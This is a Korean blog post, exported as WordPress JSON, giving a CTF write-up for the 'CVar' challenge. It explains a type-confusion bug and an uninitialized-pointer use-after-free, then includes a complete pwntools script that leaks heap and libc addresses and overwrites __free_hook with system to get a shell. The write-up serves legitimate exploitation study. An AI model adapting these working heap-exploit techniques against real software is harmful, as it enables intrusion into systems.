{"id":285,"date":"2019-06-21T17:57:27","date_gmt":"2019-06-21T08:57:27","guid":{"rendered":"http:\/\/ipwn.kr\/?p=285"},"modified":"2022-02-12T01:17:54","modified_gmt":"2022-02-11T16:17:54","slug":"rootctf-cvar","status":"publish","type":"post","link":"http:\/\/ipwn.kr\/index.php\/2019\/06\/21\/rootctf-cvar\/","title":{"rendered":"[RootCTF] CVar"},"content":{"rendered":"<h1>CVar<\/h1>\n<hr>\n<p>\ubb38\uc81c \uc9c4\uc9dc \ubd84\uc11d\ud558\uae30\ub3c4 \uc5b4\ub835\uace0 \ud480\uae30\ub3c4 \uc5b4\ub835\uace0 \uc9c4\uc9dc \uc774\ub984\uac12\ud55c\ub2e4 \ucd5c\uc801\ud654 \ud55c \ubb38\uc81c\ub3c4 \uc544\ub2cc\ub370 \ucd5c\uc801\ud654 \ud55c \uac83 \ub9c8\ub0e5 \ubd84\uc11d\ub3c4 \uc5b4\ub835\uace0&#8230; \uc554\ud2bc \ud480\uc5c8\uc73c\ub2c8 write-up\uc744 \uc368\uc57c\uaca0\ub2e4.<\/p>\n<h2>Mitigation<\/h2>\n<hr>\n<ul>\n<li><span style=\"color:green\">RELRO   : Full RELRO<\/span><\/li>\n<li><span style=\"color:green\">Stack   : Canary<\/span><\/li>\n<li><span style=\"color:green\">NX  : NX enabled<\/span><\/li>\n<li><span style=\"color:green\">PIE : PIE enabled<\/span><\/li>\n<\/ul>\n<p>\ud480 \ubbf8\ud2f0\uac8c\uc774\uc158\uc774 \uac78\ub824\uc788\ub2e4. \uc0ac\uc2e4 \uc774\uac8c \ud070 \ub09c\uad00\uc740 \uc544\ub2c8\ub2e4. libc leak \ud560 \ub54c\ub3c4 \uadf8\ub807\uace0 \ubb50&#8230;<br \/>\npie\ub791 relro\uac00 \uaebc\uc838\uc788\uc5c8\ub2e4\uba74 \uc880 \ub354 \uc26c\uc6e0\uc744\uc9c0\ub3c4 \ubaa8\ub974\uaca0\uc9c0\ub9cc \ubbf8\ud2f0\uac8c\uc774\uc158\uc740 \ud06c\uac8c \uc0c1\uad00 \uc5c6\uc744\ub4ef.<\/p>\n<h2>Analyzing<\/h2>\n<hr>\n<p>CTF\ub54c\ub77c\uba74 \ucde8\uc57d\uc810\ub9cc \uc788\ub294 \ubd80\ubd84 \ub300\ucda9 \ucc3e\uc73c\ub824 \ud588\uaca0\uc9c0\ub9cc \uc2dc\uac04\ub3c4 \ub9ce\uc774 \uc788\uace0,<br \/>\n\ud0c0\uc784\uc5b4\ud0dd\uc2dd\uc73c\ub85c \ubb38\uc81c \ud478\ub294 \uac78 \uc2eb\uc5b4\ud574\uc11c \uc804\ubd80 \ub2e4 \ubd84\uc11d\ud588\ub2e4. 
\uadf8\ub798\uc11c \ubd84\uc11d\ud558\ub294\ub370 \ub300\ucda9 6\uc2dc\uac04 \ub118\uac8c \uac78\ub9b0 \uac83 \uac19\ub2e4.<\/p>\n<h3>Intro<\/h3>\n<hr>\n<ol>\n<li>\ubc30\uc5f4, \uc815\uc218(int)\ud0c0\uc785, string\ud0c0\uc785 \uc774\ub807\uac8c \uad6c\ud604.<\/li>\n<li>int \ud0c0\uc785 \ubcc0\uc218\uc5d0 string \ud0c0\uc785 \ubcc0\uc218\ub97c \ub123\uc5b4\uc8fc\uba74 type check\ud558\ub294 \uac12\uc744 \uc548 \ubc14\uafd4\uc90c.<\/li>\n<li>array \ub9cc\ub4e4 \ub54c next array\ub97c \uac00\ub9ac\ud0a4\ub294 \ubd80\ubd84\uc744 0\uc73c\ub85c \ucd08\uae30\ud654 \ud558\uc9c0 \uc54a\uc74c -> uaf\ub85c \uc8fc\uc791 \uac00\ub2a5<\/li>\n<\/ol>\n<p>\ub300\ucda9 \uc774 \uc138 \uac1c\ub9cc \uc54c\uace0 \ud480\uba74 \ub418\ub294\ub370 3\ubc88\uc9f8 \uc800 \ucde8\uc57d\uc810 \ucc3e\ub294\uac8c \uc740\uadfc \uc5b4\ub824\uc6e0\ub2e4. \uacb0\uad6d \uc190\ud37c\uc9d5\uc73c\ub85c \ucc3e\uc544\ub0c4 \u314e\u314b\u314b<\/p>\n<p><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c96f30f06681178.png\" title=\"CVar type unchange\"><img decoding=\"async\" src=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c96f30f06681178.png\" alt=\"CVar type unchange\" title=\"CVar type unchange\" \/><\/a><\/p>\n<p>\uc774 \ubd80\ubd84\uc774 \ub300\ucda9 int\ud615 \ubcc0\uc218\uc5d0\ub2e4\uac00 string\ubcc0\uc218 \uc9d1\uc5b4\ub123\uc744 \ub54c type \uc548 \ubc14\uafd4\uc8fc\ub294 \uacf3\uc774\uace0.<\/p>\n<p><a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c97a16c94e72029.png\" title=\"Uninitialized_pointer\"><img decoding=\"async\" src=\"https:\/\/i.loli.net\/2019\/06\/21\/5d0c97a16c94e72029.png\" alt=\"Uninitialized_pointer\" title=\"Uninitialized_pointer\" \/><\/a><\/p>\n<p>\uc774 \ubd80\ubd84\uc774 next array \ucd08\uae30\ud654 \uc548 \ud574\uc8fc\ub294 \ubd80\ubd84\uc778\ub370 \uc74c \uadf8\ub807\ub2e4 \ubd84\uc11d\ud558\uae30 \uc9c4\uc9dc \uc5b4\ub824\uc6e0\ub2e4.<\/p>\n<h3>Scenario<\/h3>\n<hr>\n<p>\ucde8\uc57d\uc810 
\uc138 \uac00\uc9c0\ub97c \ucc3e\uc544\ub0b8 \ud6c4\uc5d0\ub3c4 exploit \uc2dc\ub098\ub9ac\uc624 \uc0dd\uac01\ud558\ub294\ub370\ub3c4 \ud070 \uc2dc\uac04\uc744 \uc3df\uc558\ub2e4. \uc544\uc9c1 \ubd80\uc871\ud568 \ucc9c\uc9c0\uc778\ub4ef.<\/p>\n<h4>Heap leak<\/h4>\n<hr>\n<ol>\n<li>var a = 1 \uac19\uc774 \uac4d int\ud615 \ubcc0\uc218 \uc120\uc5b8<\/li>\n<li>var b = &#8220;&#8221; \uac19\uc774 string\ud615 \ubcc0\uc218 \uc120\uc5b8<\/li>\n<li>a = b\ub85c \uac12 \ub123\uc5b4\uc8fc\uba74 b\uc758 \ubb38\uc790\uc5f4 \uc8fc\uc19f\uac12\uc774 \uc22b\uc790 \uc801\ud788\ub294 \uacf3\uc5d0 \uc801\ud798<\/li>\n<li>\uadfc\ub370 a\ubcc0\uc218\uc758 type\uc740 int\ud615 \uadf8\ub300\ub85c \ub0a8\uc544\uc788\uc5b4\uc11c \uc8fc\uc19f\uac12\uc774 leak\ub428 (heap leak)<\/li>\n<\/ol>\n<h4>Libc leak<\/h4>\n<hr>\n<ol>\n<li>string\uc744 \uac81\ub098 \ud06c\uac8c \ub9cc\ub4e4\uc5b4\uc8fc\uba74\uc11c Fake array\ub97c \uc0dd\uc131\ud568<\/li>\n<li>string free\ud558\uace0 unsorted bin \ubcf4\ub0c4<\/li>\n<li>\ub2e4\uc2dc array \uc0dd\uc131\ud558\uba74 fake array\ub97c \ub530\ub77c\uac00\uba74\uc11c libc leak<\/li>\n<\/ol>\n<h4>Exploit<\/h4>\n<hr>\n<ol>\n<li>\ub2e4 leak\ud588\uc73c\uba74 \uc774\uc804\uc5d0 free\ub41c \ud799\ub4e4 \ub2e4 \ud560\ub2f9\ud574\uc11c \uacf5\uac04 \uba54\uafd4\uc90c<\/li>\n<li>\ub2e4\uc2dc string\ubcc0\uc218\ub85c Fake array \uc0dd\uc131<\/li>\n<li>free\ud558\uc9c0 \uc54a\uace0 \ub2e4\ub978 string\ub4e4 \ub354 \uc0dd\uc131<\/li>\n<li>fake array\ucabd\uc5d0\uc11c oob? 
\uac19\uc740 \ub290\ub08c\uc73c\ub85c \ub2e4\ub978 \uccad\ud06c\ub4e4 \ub36e\uc744 \uc218 \uc788\uc74c<\/li>\n<li>string\ub4e4\uc758 len\uc744 \ub36e\uc5b4\uc11c aaw \ub9cc\ub4e4\uace0 __free_hook -> system (solve.py\uc758 libc offset\uc740 \ub300\uc0c1 libc \ube4c\ub4dc \uae30\uc900\uc73c\ub85c \ud558\ub4dc\ucf54\ub529\ub418\uc5b4 \uc788\uc73c\ubbc0\ub85c \ub2e4\ub978 libc\uc5d0\uc11c\ub294 \ub2e4\uc2dc \uad6c\ud574\uc57c \ud568)<\/li>\n<li>\/bin\/sh\uc774\ub77c\ub294 \uc774\ub984\uc758 \ubcc0\uc218 \uc9c0\uc6cc\uc8fc\uba74 shell<\/li>\n<\/ol>\n<p>\uc2dc\ub098\ub9ac\uc624\ub294 \ub300\ucda9 \uc774\ub7f0 \ub290\ub08c\uc774\uc5c8\ub358 \uac83 \uac19\ub2e4.<\/p>\n<h2>solve.py<\/h2>\n<pre><code class=\"language-python \">from pwn import *\n\ne = ELF('.\/CVar')\nlibc = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6')\np = process(e.path)\n\nsla = p.sendlineafter\nsa = p.sendafter\nnum_type = 0x440\nstr_type = 0x4a0\narr_element_type = 0x650\nfake = 0x740\nname = 0x5d0\nstr_fake = 0x780\nlib = 0x710\n\ndelete = lambda name:sla('&gt; ', 'delete ' + name)\nview = lambda name:sla('&gt; ', name)\nassign = lambda name1, name2:sla('&gt; ', '{0}={1}'.format(name1, name2))\n\ndef new_var(name, val, mode):\n\n    if mode == 'str':\n        sla('&gt; ', 'var {0}=\"{1}\"'.format(name, val))\n\n    elif mode == 'num':\n        sla('&gt; ', 'var {0}={1}'.format(name, val))\n\n    elif mode == 'array':\n        sla('&gt; ', 'var {0}=new array{1}'.format(name, val))\n\ndef array_assign(name, dimen, val, mode):\n    if mode == 'num':\n        sla('&gt; ', '{0}{1}={2}'.format(name,dimen,val))\n\n    elif mode == 'str':\n        sla('&gt; ', '{0}{1}=\"{2}\"'.format(name, dimen, val))\n\n\nnew_var('\/bin\/sh', 1234, 'num')\nnew_var('b', 'ipwnipwnipwn', 'str')\nassign('\/bin\/sh', 'b')\nview('\/bin\/sh')\np.recvuntil('\/bin\/sh[')\nheap_base = int(p.recvuntil(']')[:-1]) - 0x590\nlog.info('heap : 0x%x'%heap_base)\n\nnum_type += heap_base\nstr_type += heap_base\narr_element_type += heap_base\nfake += heap_base\nname += heap_base\nstr_fake += heap_base\nlib += heap_base\n\nfake_arr = ''.ljust(0x70, '\\x00')\nfake_arr += p64(fake)\nfake_arr = fake_arr.ljust(0x130, '\\x00')\nfake_arr += p64(arr_element_type) + 
p64(0x1) + p64(0) + p64(str_fake)\nfake_arr = fake_arr.ljust(0x170, '\\x00')\nfake_arr += p64(str_type) + p64(name) + p64(lib) + p64(8)\nfake_arr = fake_arr.ljust(0x200, '\\x00')\n\nnew_var('c', fake_arr, 'str') \ndelete('c')\nnew_var('d', '[1][4]', 'array')\n\nview('d')\np.recvuntil('d[')\nlibc_base = u64(p.recv(6) + '\\x00\\x00') - 0x3c4b78\nsystem = libc_base + libc.sym['system']\ntarget = libc_base + 0x3c67a8\nlog.info('libc_base : 0x%x'%libc_base)\n\nfor i in range(8):\n    view('\/bin\/sh')\n\nfake_arr = p64(arr_element_type) + p64(0x10009) + p64(0)\n\nnew_var('e', fake_arr, 'str')\nfake = 0x8d0 + heap_base\n\nnew_var('f', 'ipwn', 'str')\nnew_var('g', 'ipwn', 'str')\n\nnew_var('h', '\\x00'*0x70 + p64(fake) + '\\x00'*0x188, 'str')\ndelete('h')\nnew_var('i', '[1][4]', 'array')\narray_assign('i', '[0][0][6]', 'ipwn', 'str')\n\npay = p64(heap_base + 0x650) + p64(0x10009)\npay += p64(0)*3 + p64(0x31)\npay += p64(heap_base + 0x890) + p64(heap_base + 0x8b0)\npay += p64(target) + p64(0xffff)\n\nassign('e', '\"' + pay + '\"')\nassign('e', '\"' + p64(system) + '\"')\n\ndelete('\/bin\/sh')\np.interactive()\n<\/code><\/pre>\n<h2>\ud6c4\uae30<\/h2>\n<hr>\n<p>\ud480\uba74\uc11c \uc9c4\uc9dc \ud654\ub098\uba74\uc11c \uc7ac\ubc0c\uac8c &#8230;\u314e\u314e&#8230;. \ud480\uc5c8\ub2e4 \uc774\uc81c \uc870\uae08\uc774\ub098\ub9c8 \ubd84\uc11d \uc2e4\ub825\uc774 \ub298\uc9c0 \uc54a\uc744\uae4c ?? \u314e\u314e \ub531\ud788 \ud799\ud2b8\ub9ad\uc774 \uc788\ub358 \uac83\ub3c4 \uc544\ub2c8\uace0 \uac4d \ubd84\uc11d \uc798 \ud574\uc11c \ud799 \uc5b4\ub5bb\uac8c \ub418\ub294\uc9c0\ub9cc \uc798 \uc54c\uc544\ub0b4\uba74 \ub418\ub294 \ubb38\uc81c\uc600\ub2e4! 
\uadf8\ub7f0 \uac78 \uc0dd\uac01\ud574\ubcf4\uba74 \uaf64\ub098 \uc624\ub798 \uc7a1\uc740 \ubb38\uc81c\uc778\ub4ef<\/p>\n<p>\ubc14\uc774\ub108\ub9ac\ub294 \ud5c8\ub77d \ub9e1\uace0 \uc5c5\ub85c\ub4dc\ud569\ub2c8\ub2e4 \u314e\u314e<br \/>\n<a href=\"http:\/\/ipwn.kr\/binary\/CVar\">CVar<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CVar \ubb38\uc81c \uc9c4\uc9dc \ubd84\uc11d\ud558\uae30\ub3c4 \uc5b4\ub835\uace0 \ud480\uae30\ub3c4 \uc5b4\ub835\uace0 \uc9c4\uc9dc \uc774\ub984\uac12\ud55c\ub2e4 \ucd5c\uc801\ud654 \ud55c \ubb38\uc81c\ub3c4 \uc544\ub2cc\ub370 \ucd5c\uc801\ud654 \ud55c \uac83 \ub9c8\ub0e5 \ubd84\uc11d\ub3c4 \uc5b4\ub835\uace0&#8230; \uc554\ud2bc \ud480\uc5c8\uc73c\ub2c8 write-up\uc744 \uc368\uc57c\uaca0\ub2e4. Mitigation RELRO : Full RELRO Stack : Canary NX : NX enabled PIE : PIE enabled \ud480 \ubbf8\ud2f0\uac8c\uc774\uc158\uc774 \uac78\ub824\uc788\ub2e4. \uc0ac\uc2e4 \uc774\uac8c \ud070 \ub09c\uad00\uc740 \uc544\ub2c8\ub2e4. libc leak \ud560 \ub54c\ub3c4 \uadf8\ub807\uace0 \ubb50&#8230; pie\ub791 
relro\uac00&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,11],"tags":[],"class_list":["post-285","post","type-post","status-publish","format-standard","hentry","category-http-ipwn-kr-blog-pwnable","category-writep-up"],"_links":{"self":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/285"}],"collection":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/comments?post=285"}],"version-history":[{"count":62,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/285\/revisions"}],"predecessor-version":[{"id":926,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/posts\/285\/revisions\/926"}],"wp:attachment":[{"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/media?parent=285"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/categories?post=285"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ipwn.kr\/index.php\/wp-json\/wp\/v2\/tags?post=285"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}